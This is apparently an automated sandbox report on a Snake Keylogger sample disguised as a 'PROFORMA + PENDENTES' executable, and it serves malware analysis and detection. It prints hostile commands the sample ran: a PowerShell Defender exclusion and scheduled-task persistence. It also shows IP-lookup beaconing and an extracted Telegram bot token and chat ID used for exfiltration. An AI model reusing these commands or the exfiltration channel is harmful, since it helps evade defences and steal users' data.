Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe, ParentImage: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe, ParentProcessId: 5512, ParentProcessName: WYqxTmjfOgdZ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp", ProcessId: 7096, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ParentImage: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe, ParentProcessId: 7924, ParentProcessName: PROFORMA + PENDENTES.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", ProcessId: 7268, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ParentImage: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe, ParentProcessId: 7924, ParentProcessName: PROFORMA + PENDENTES.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ProcessId: 8152, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ParentImage: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe, ParentProcessId: 7924, ParentProcessName: PROFORMA + PENDENTES.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", ProcessId: 7268, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:18:46.999640+0100	2803305	3	Unknown Traffic	192.168.2.8	49712	188.114.97.3	443	TCP
2024-11-18T18:18:49.988518+0100	2803305	3	Unknown Traffic	192.168.2.8	49716	188.114.97.3	443	TCP
2024-11-18T18:18:52.714103+0100	2803305	3	Unknown Traffic	192.168.2.8	49722	188.114.97.3	443	TCP
2024-11-18T18:18:54.183906+0100	2803305	3	Unknown Traffic	192.168.2.8	49727	188.114.97.3	443	TCP
2024-11-18T18:18:54.487444+0100	2803305	3	Unknown Traffic	192.168.2.8	49729	188.114.97.3	443	TCP
2024-11-18T18:18:57.885212+0100	2803305	3	Unknown Traffic	192.168.2.8	49737	188.114.97.3	443	TCP
2024-11-18T18:19:01.307167+0100	2803305	3	Unknown Traffic	192.168.2.8	49741	188.114.97.3	443	TCP
2024-11-18T18:19:03.984760+0100	2803305	3	Unknown Traffic	192.168.2.8	49743	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T18:18:44.688413+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49709	158.101.44.242	80	TCP
2024-11-18T18:18:46.219431+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49709	158.101.44.242	80	TCP
2024-11-18T18:18:47.703797+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49713	158.101.44.242	80	TCP
2024-11-18T18:18:50.657522+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49717	158.101.44.242	80	TCP
2024-11-18T18:18:51.735169+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49717	158.101.44.242	80	TCP
2024-11-18T18:18:53.453796+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49724	158.101.44.242	80	TCP
2024-11-18T18:18:54.891309+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49731	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PROFORMA + PENDENTES.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Avira: detection malicious, Label: HEUR/AGEN.1305624

Found malware configuration

Source: 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8071929169:AAFUKNAcxQ6ezyCHGQASc7PxQv_smeADnUQ/sendMessage?chat_id=5985897351", "Token": "8071929169:AAFUKNAcxQ6ezyCHGQASc7PxQv_smeADnUQ", "Chat_id": "5985897351", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Source: PROFORMA + PENDENTES.exe

ReversingLabs: Detection: 32%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PROFORMA + PENDENTES.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: PROFORMA + PENDENTES.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49719 version: TLS 1.0

Source: PROFORMA + PENDENTES.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49731 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49713 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49724 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49743 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49729 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49727 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49719 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa

Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgH
Source: WYqxTmjfOgdZ.exe, 00000010.00000002.1694863278.0000000006560000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mv
Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
